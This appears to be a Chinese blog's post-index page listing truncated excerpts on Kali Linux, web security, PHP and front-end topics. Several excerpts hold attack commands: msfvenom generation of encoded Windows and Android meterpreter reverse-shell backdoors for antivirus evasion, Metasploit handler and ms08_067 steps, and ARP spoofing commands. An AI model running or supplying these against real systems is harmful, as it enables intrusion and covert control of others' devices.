- 博客(42)
- 资源 (21)
- 收藏
- 关注
RSS订阅原创 Kali 安装USB无线网卡驱动
为所有用户安装将文件与Python相关联(需要py launcher)。为已安装的应用程序创建快捷方式将Python添加到环境变量中预编译标准库下载调试符号下载调试二进制文件(需要VS 2017或更高版本)...
2021-06-30 23:47:18
6771
4
原创 mysql 查询所有数据库总数量
一般来说一些小的项目数据库不多,但千万级以上的项目肯定就不单止一两个数据库了。那如果要统计所有数据库的时候就不可能一行一行代码去敲。--查询单个数据库数据总量SELECT SUM(table_rows) FROM TABLES WHERE TABLE_SCHEMA = 'test_schemaName'ORDER BY table_rows DESC;不废话,上代码。-- 只显示所有数据库中前十条数据量最大的。select table_name,table_rows fro.
2021-06-26 17:20:28
7327
原创 VM虚拟机陨石坑大全,不定期更新
0x01:无法打开已存在的虚拟机(虚拟机配置文件.vmx) 陨石坑- -更新时间:2018年8月13日07:09:04解决:把共享虚拟机关了就行了完成图:0x02:重启就没网络了,依稀记得折腾了我不止半个月因此还换过好几个虚拟机(陨石天坑不解释)更新时间:2018年8月13日07:11:02只需将VM的虚拟网络编辑器中关于 VMnet0 的设置改一下就行了:...
2018-08-13 07:19:21
551
原创 Kali的学习笔记篇(八)使用msf生成的shellcode制作免杀payload
环境: kali-linux-2018.2-amd.iso Visual Studio 2017 msfvenom 更新时间:2018年8月13日07:06:43直接注入的生成方式(一)://生成c格式的后门,-p指定模块,-e 指定编码,-i指定编码次数,-f 输出格式,-b 去除指定代码root@kali:~# msfvenom -p wi...
2018-08-13 03:18:10
6434
2
原创 kali的学习笔记篇(七)metasploit之PC后门
//生成后门//参数可参照第五篇文章:PC渗透参数集msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=192.168.1.113 LPORT=55555 -f exe > /root/muma.exe //选择模块use exploit/multi/handler//装载攻击载...
2018-08-12 07:37:24
1129
原创 白帽子讲web安全之浏览器安全(二)同源策略
(一)同源策略:源(Origin)浏览器最核心最基础的安全功能,web建立在同源策略之上。作用:限制了不同Origin之间的document和脚本,相互间不能干扰。影响Origin的因素有host(域名或IP地址)下方例子在a.com中加载了b.com的b.js,那么它的Origin就是a.com。<script src = https://b.com/b.js&g...
2018-08-12 03:51:36
321
原创 kali的学习笔记篇(一)基础入门
2018年7月30日 07:01:27环境:win10自带Hyper-v虚拟机系统:最新版2.0kali ISO镜像文件。kali-linux-2018.2-i386.iso在控制面板《开启哪些程序》里开启Hyper-v平台打开任务管理器点击性能点击CPU查看是否开启虚拟化,或者win+r输入msinfo32 拉到最下面看那四个关于虚拟化的是与否,要全部是才能开启虚拟化技...
2018-08-12 03:47:23
11044
1
原创 kali的学习笔记篇(五)metasploit之PC后门参数集
参数列表:show exploits列出metasploit框架中的所有渗透攻击模块。show payloads列出metasploit框架中的所有攻击载荷。show auxiliary列出metasploit框架中的所有辅助攻击载荷。search name查找metasploit框架中所有的渗透攻击和其他模块。info展示出指定渗透攻击或模块的相关信息。u...
2018-08-12 02:33:19
729
原创 kali的学习笔记篇(六)metasploit之安卓后门
环境: kali-linux-2018.-2-amd-64.iso android 支持外网监听0x01://生成安卓木马:msfvenom -p android/meterpreter/reverse_tcp LHOST=[myIP] LPORT=55555 R &amp;amp;amp;gt; [akpNAME].apk0x02://加载攻击模块use exploit/m...
2018-08-12 02:28:37
3496
3
原创 kali的学习笔记篇(四)metasploit之远控
看的是15年的老电影了(教程)msfpayload 15年就被丢弃了,搞了才发现被集成到msfvenom里了。生成木马:#参数 -p [指定攻击载荷名称]#参数 -f [指定payload的输出格式]#参数 -x 指定捆绑到哪个文件上 msfvenom -p windows/meterpreter/reverse_tcp LHOST=[myIP] LPORT=[myPORT] ...
2018-08-11 05:51:29
1393
原创 kali的学习笔记篇(三)Metasploit初试炼
exploit:利用漏洞payload:攻击载荷#进入msf控制台msfconsolehelp查看帮助信息show 显示攻击载荷开始攻击#装载攻击载荷选择windows系统模块/ms08_067漏洞use exploit/windows/smb/ms08_067_netapi#查看选项show options#选择目标set RHOST targetIP#...
2018-08-11 04:28:04
467
原创 Kali Linux / centOS 7 SSH踩过得坑(不定期更新)
0x00: 最近学习kali linux,闻之初是三年前了。随已不是从前计划中的自己,但也尽力去突破新的自己。 环境:kali-linux 2018-2amd64镜像0x01:关于ssh输入密码无法登陆的坑cause :一开始好好的,开机后就连接不上了。看了看/etc/ssh/ssh_config文件,少了很多配置,重装了很多遍还是这样解决:找遍百度基本都与我的配置不一样...
2018-08-11 00:26:11
2119
原创 putty vi右键不能黏贴
环境:kali2018镜像,Hyper-v虚拟机背景:在设置好ssh远程登录后使用putty打开source文件添加更新源结果复制的更新源右键无法黏贴, 解决:方法一:在普通模式下键入“ :set mouse-=a”(不包括引号)方法二:编辑 ~/.vimrc 文件,加入如下代码:if has('mouse') set mouse-=a endif方法一每次打开vi...
2018-08-10 04:35:19
3431
1
原创 关于linux下用户与组的安全知识(一)
环境:centOS 7搭建好了开发环境,接下来翻阅一些安全知识,打算从《白帽子讲web安全》中提及的最小权限原则开始对服务器进行安全部署。翻阅了一些关于linux下用户与组的知识,本人小白大佬略过。查看当前登录用户:whoami 一般回显root查看当前组内成员:groups查看所有用户:cat /etc/passwd ,查看活跃的用户列表cat w /etc/passw...
2018-08-02 04:12:44
247
原创 centOS 7配置ssh 限制ip登录
环境:centOS 7.0在网站备案完毕后部署完服务器打算进一步设置一些安全部署,网上搜罗了一些这方面的文章,打算先执行《白帽子讲web安全》中提及的最小权限原则。PS:因本人外网ip非固定ip除了方法一在putty中配置没问题外没有在其余外网ip亲测(- -公司也不搞个固定ip,我还能说啥)方法一:首先需要限制登录的ip(外网ip)XXX为外网IPVim /etc/hosts....
2018-08-02 03:06:46
10123
2
原创 kali的学习笔记篇(二)ARP入门实战篇
环境:kali2.0kali-linux-2018.2-i386.iso工具:arpspoof ARP断网工具ettercap ARP欺骗工具driftnet 图片劫持 ARP断网攻击:ifconfig //获取网卡信息fping -asg 192.168.1.1/24 //获取局域网存活主机arpspoof -i <网卡> -t <目标...
2018-07-31 19:11:25
1117
2
原创 白帽子讲web安全之安全原则(一)安全原则
安全原则(一)白名单原则:当使用了黑名单原则后可能会造成权限绕过,应该使用白名单原则。例如:以后浏览器更新了新的html标签,黑名单中没有,那么可能就会造成安全隐患(二)最小权限原则:按需赋予权限,按需上调(类似灰度发布模型)(三)纵深防御原则:1,从多个角度去设计安全方案。2,在正确的地方做正确的事。0x01:在多维层面设计安全方案,完美构建一个安全方案,如某广告...
2018-07-24 22:30:11
2905
原创 记录一次https的坑
环境:php tp5 lnmp加入https后访问网站正常。而一旦提交表单就404找了半天没搞懂,http正常提交相应。https404后来勉强算是找到了解决方法(毫无卵用)使用tp5的url兼容模式提交?s=模块/控制器/方法继续寻找问题,官方说是服务器不支持phpinfo。妈耶不存在的啊。明明支持并开启着好吗。这很玄学,后续真正解决了回来修改。...
2018-07-21 04:48:27
243
原创 开启gzip压缩
http{}:gzip on; 46 gzip_min_length 1k; 47 gzip_buffers 4 16k; 48 gzip_http_version 1.1; 49 gzip_comp_level 2; 50 gzip_types ...
2018-07-20 20:00:55
641
原创 ssl 此页中包含其他不安全资源
本页不但包含安全的内容,也包含不安全的内容 为什么会出现这种安全提示呢?因为SSL证书对网站代码的安全性要求很高,但许多用户网站中却使用了大量的外链,而这些外部的资源(图片或js)正是不安全的因素所在,因此用户在部署SSL证书后需要对网站代码进行调整,这样才能保障网站的安全;在部署SSL证书后,通过https访问网站时,有些网站会出现以下提示,不同的浏览器提示也不一样,下面已IE,火...
2018-07-18 21:08:06
3614
原创 TP5使用redis
use think\Cache;//redis对象 public function getRedis() { $options = [ 'type' => 'redis',//指定类型 'password'=>'asdfghjkl', 'prefix' => 'sbn-', ...
2018-07-13 19:26:29
1902
原创 校验手机号营运商
进攻参考 public function telpohone($varibale) { // $telp = '';// var_dump($varibale); $tel ['移动'] = [ '134','135','136','137','138','139','147','150','151','152','157',...
2018-07-13 19:24:36
214
转载 XSS字符串校验工具类
public function verification($varibale) { $vitaArray = [ "/", '<', '>', '\'',...
2018-07-13 19:22:19
2745
原创 持续更新一些前端小知识点总结
<!--自动加载滚动条--><div style="height:100px;width:100px;overflow:auto;"></div><!--根据某小时的消息提示--><script>var time=new Date();var h=time.getHours();if(h>=0&&h&am
2018-07-13 19:21:11
177
原创 音乐上传小案例
语言:php,thinkphp5仅供新手参考,学习大佬请过滤 //上传音乐----------------------------------------; public function UploadMusic(){ //上传长度 //$maxSize = 20*1024; //上传类型 //设置文件类型数组 $type = ['MP3','AAC','WAV','WMA','CDA'...
2018-07-13 17:57:45
458
原创 关于php探针弱口令
昨晚某圈子一个基佬说拿到数据库但动不了,然后我手起刀落- -也没弄好,一句话木马可以写入,但一加上绝对路径就不行了。爆#1 ... sql错误但是不加上绝对路径或者使用tmp/shell.php 路径就可以这是啥原因呢老哥们他那服务器用的lnmp一键装的欢迎写下评论看法...
2018-07-07 18:26:49
1340
原创 免费下载收费歌曲
注释写代码里了,直接上代码吧 function musicKuwo() { $musicName = input('musicName'); if(!$musicName) return $this->redirect('/#Index/index'); $data = UtilsAl...
2018-06-29 19:56:18
6575
4
原创 关于防止sql注入和css注入
addslashes()函数和htmlspecialchars()函数addslashes(),向字符串中的预定义字符添加反斜杠进行转义,预定义字符:单引号(')双引号(")反斜杠(\)NULL这样的做法可以预防sql的注入htmlspecialchars(),htmlspecialchars($kind_emailsAdd,ENT_QUOTES);对$lomd_emailsAdd 这个字符串变量...
2018-06-22 06:37:42
918
原创 jquery单击任意元素隐藏某元素
单一点击事件,停止事件冒泡$(document).click(function(){//所有元素被单击,则隐藏 $("#pictureboom").css('display','none');});$("#pictureboom,#if").click(function(event){//如果这两个元素被单击,停止事件冒泡 event.stopPropagation();});$('#...
2018-06-20 20:48:04
336
原创 关于lnmp权限问题
方法1:.user.ini文件无法直接修改,如要修或删除需要先执行:chattr -i /网站目录/.user.ini可以使用winscp文件管理、vim编辑器或nano编辑器进行修改。删除的话rm -f /网站目录/.user.ini 就可以。修改完成后再执行:chattr +i /网站目录/.user.ini.user.ini不需要重启一般5分钟左右生效,也可以重启一下php-fp...
2018-06-19 22:27:59
993
原创 一个简单的表单,说说几个踩过的坑
jquery+boostrap3CDN:<link rel="stylesheet" href="https://cdn.bootcss.com/bootstrap/3.3.7/css/bootstrap.min.css"/><script src="https://cdn.bootcss.com/jquery/2.1.1/jquery.min.js"></scr...
2018-06-18 17:17:28
545
原创 内嵌H5的canvas,iframe等块级元素为背景
html{height:100%;background-image:-webkit-radial-gradient(ellipse farthest-corner at center top,#000d4d 0,#000105 100%);background-image:radial-gradient(ellipse farthest-corner at center top,#000d4d 0...
2018-06-16 21:03:36
1313
原创 Bootstrap 写一个表单+内嵌图标
使用轻量级jquery框架+css+div+Bootstrap亲和移动端框架HTML:<div class = 'form-group has-feedback'> <div class = 'col-lg-3'> <label for = 'psd' >密码: </label> <!--<button type = 'b...
2018-06-15 18:15:07
1487
原创 tp5多站点怎么配置权限啊
.user.ini:目录结构:fastcgi.conf:之前在这个配置里加了一段然后删了.user.ini 就可以了。,但现在多站点再加就不行。大佬们教教我
2018-06-15 10:27:27
708
原创 html5新特性之canvas动画
直接贴代码HTML:<canvas id="canvas" width="1349" height="404"> </canvas>CSS:html{height:100%;background-image:-webkit-radial-gradient(ellipse farthest-corner at center top,#000d4d 0,#000105 10...
2018-06-15 10:21:32
606
原创 背景切换jquery
jquery://404背景切换js$(document).ready(function(){ $('#bodyColorDF').css('background-color','black'); $('#bodyColor1').css('background-image','url(/static/image/tabpicture/1.jpg)'); $('#bo...
2018-06-15 10:17:40
403
原创 复习一下bootstrap,先来个简单的表单
<!DOCTYPE html><html><!--构思不完善--><head> <title>GYL-Task Management System</title> <meta charset="utf-8"> <!-- 确保不同分辨率正确显示页面 --&
2018-06-15 10:13:46
177
转载 变色鸟特效
<canvas></canvas><style type = 'text-css'>html, body { margin:0; background:#000;}canvas { display:block;}</style><script>var Birds = function(){ var me = this; ...
2018-06-15 10:05:06
129
原创 linux环境下开关防火墙
环境:阿里云ECS、centos 7一、防火墙配置配置lnmp环境后mysql无法远程登录,记录一下配置iptables防火墙的步骤1、检测并关闭firewall12345systemctl status firewalld.service #检测是否开启了firewall systemctl stop firewalld.service #关闭firewall sytsemctl disable...
2018-06-06 23:15:45
234
转载 http请求头解析
Request Headers:下图是我访问一个URL:http://www.hzau.edu.cn的一个header,根据具体实例来分析一下各部分的功能及其作用。 Accept作用: 浏览器端可以接受的媒体类型,例如: Accept: text/html 代表浏览器可以接受服务器回发的类型为 text/html 也就是我们常说的html文档,如果服务器无法返回text/html类型的数据,...
2018-06-05 19:08:57
626
PrivatyRoom(隐私空间)
2018-08-02
一个简单的音乐播放器实例
2018-06-29
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人